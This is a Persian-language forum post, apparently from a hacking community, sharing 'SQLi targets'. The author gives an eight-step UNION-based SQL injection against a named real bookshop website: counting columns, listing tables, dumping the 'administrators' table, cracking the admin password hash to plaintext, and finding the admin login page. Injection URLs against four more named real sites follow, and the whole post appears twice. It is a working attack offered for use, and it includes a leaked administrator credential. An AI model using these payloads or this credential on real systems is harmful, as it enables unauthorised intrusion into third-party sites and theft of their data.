RE: تارگت های SQLi
سلام دوستان
من هم يه تارگت گذاشتم. البته مراحل كار را به ترتيب براتون نوشتم. هر چند كه مي دونم تمام دوستان توي اين كار خبره اند.
تارگت:
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=3393[/php]
1- پيدا كردن تعداد ستون ها
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=3393'+order+by+18--+[/php]
2-پيدا كردن ستون هاي آسيب پذير
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--+[/php]
3- پيدا كردن نسخه ي ديتابيس
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18--+[/php]
4- پيدا كردن نام جداول
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(table_name),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informat ion_schema.tables+where+table_schema=database()--+[/php]
5- پيدا كردن ستون هاي موجود در جدول مورد نظر
[php]Table_Name = administrators
http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(column_name),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informa tion_schema.columns+where+table_name=0x61646D696E6 973747261746F7273--+
[/php]
6- پيدا كردن محتويات ستون هاي مورد نظر
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(user_name,0x3a,u ser_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+from+administrators--+
[/php]
7- ديكد كردن رمز هش شده
[php]User: admin
Password: 42d8aa7cde9c78c4757862d84620c335 = q1w2e3r4t5[/php]
8- پيدا كردن صفحه ي لاگين مديريت
[php]http://www.cobee.com.sg/administrator/index.html[/php]
با تقديم احترام
صداقت
[hr]
[php]http://www.giftsparadise.ca/products.php?ssid=-999%27+/*!50000UNION*/+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21--+--
http://www.senscot.net/view_prof.php?viewid=-2906+union+select+1,@@version--
http://www.fiapo.org/view_news.php?viewid=-11818+union+select+@@version,2,3--
http://www.westlibertyindex.com/article.php?viewID=-4890+/*!50000UNION*/+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12--
[/php]
توضيح درباره ي لينك آخر:
اگه دقت كرده باشيد در وسط صفحه چيزي نمايش داده نميشه ولي وقتي به نوار عنوان نگاه مي كنيد مي بينيد كه نسخه ي ديتابيس در اون جا به نمايش گذاشته شده.
با تقديم احترام
صداقت
سلام دوستان
من هم يه تارگت گذاشتم. البته مراحل كار را به ترتيب براتون نوشتم. هر چند كه مي دونم تمام دوستان توي اين كار خبره اند.
تارگت:
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=3393[/php]
1- پيدا كردن تعداد ستون ها
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=3393'+order+by+18--+[/php]
2-پيدا كردن ستون هاي آسيب پذير
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--+[/php]
3- پيدا كردن نسخه ي ديتابيس
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18--+[/php]
4- پيدا كردن نام جداول
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(table_name),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informat ion_schema.tables+where+table_schema=database()--+[/php]
5- پيدا كردن ستون هاي موجود در جدول مورد نظر
[php]Table_Name = administrators
http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(column_name),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informa tion_schema.columns+where+table_name=0x61646D696E6 973747261746F7273--+
[/php]
6- پيدا كردن محتويات ستون هاي مورد نظر
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(user_name,0x3a,u ser_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+from+administrators--+
[/php]
7- ديكد كردن رمز هش شده
[php]User: admin
Password: 42d8aa7cde9c78c4757862d84620c335 = q1w2e3r4t5[/php]
8- پيدا كردن صفحه ي لاگين مديريت
[php]http://www.cobee.com.sg/administrator/index.html[/php]
با تقديم احترام
صداقت
[hr]
[php]http://www.giftsparadise.ca/products.php?ssid=-999%27+/*!50000UNION*/+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21--+--
http://www.senscot.net/view_prof.php?viewid=-2906+union+select+1,@@version--
http://www.fiapo.org/view_news.php?viewid=-11818+union+select+@@version,2,3--
http://www.westlibertyindex.com/article.php?viewID=-4890+/*!50000UNION*/+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12--
[/php]
توضيح درباره ي لينك آخر:
اگه دقت كرده باشيد در وسط صفحه چيزي نمايش داده نميشه ولي وقتي به نوار عنوان نگاه مي كنيد مي بينيد كه نسخه ي ديتابيس در اون جا به نمايش گذاشته شده.
با تقديم احترام
صداقت
نظر